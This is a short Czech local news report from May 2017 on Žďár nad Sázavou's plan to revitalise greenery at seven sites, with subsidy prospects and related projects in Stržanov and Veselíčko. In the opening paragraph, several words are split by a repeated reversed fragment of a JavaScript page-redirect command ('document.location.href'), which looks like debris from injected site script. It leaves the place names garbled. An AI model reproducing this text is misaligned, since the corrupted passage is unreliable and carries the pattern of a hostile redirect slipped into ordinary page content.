Rainbow page separator

Ve Žďáře plánují revitalizaci zeleně, vytipovali sedm lokalit

Úterý, 23. května 2017

Žďár nad Sázavou / Hřbi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tov u kostela Nejsvětější Trojice a okolí sousední Vesny, hřbi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tov v Jamské ulici a okolí Horního rybníka, ulice Štursova po by[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tový dům v ulici Jamborova, parčík za 5. základní školou a Haškova ulice, pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tor od nádraží a přístup ke Žďasu ze Strojírenské ulice, okolí hřiště v Alšově ulici a okolí ulice Neumannova. To je sedm lokalit, které chtějí zástupci žďárské radnice zanést do projektu revitalizace městské zeleně. V současné době běží výběrové řízení na projektanta, po zpracování projektu dojde na žádost o dotaci. „Je možnost až šedesátiprocentní dotace a oproti minulému plánovacímu období se mezi uznatelné náklady dají zařadit i drobné úpravy okolí, tedy cestičky či mobiliář, což by se hodilo například u parčíku za 5. základní školou,“ sdělil starosta Žďáru nad Sázavou Zdeněk Navrátil.
Pokud bude úřad s žádostí o dotaci úspěšný, práce na revitalizaci žďárské zeleně by mohly začít už v příštím roce.
Ještě dříve by ale mohlo dojít na úpravu zeleně v místní části města Stržanov, kde už se projekt nachází v procesu hodnocení ohledně přidělení dotační podpory. Dokončován je nyní také projekt na revitalizaci veřejné zeleně v osadě Veselíčko.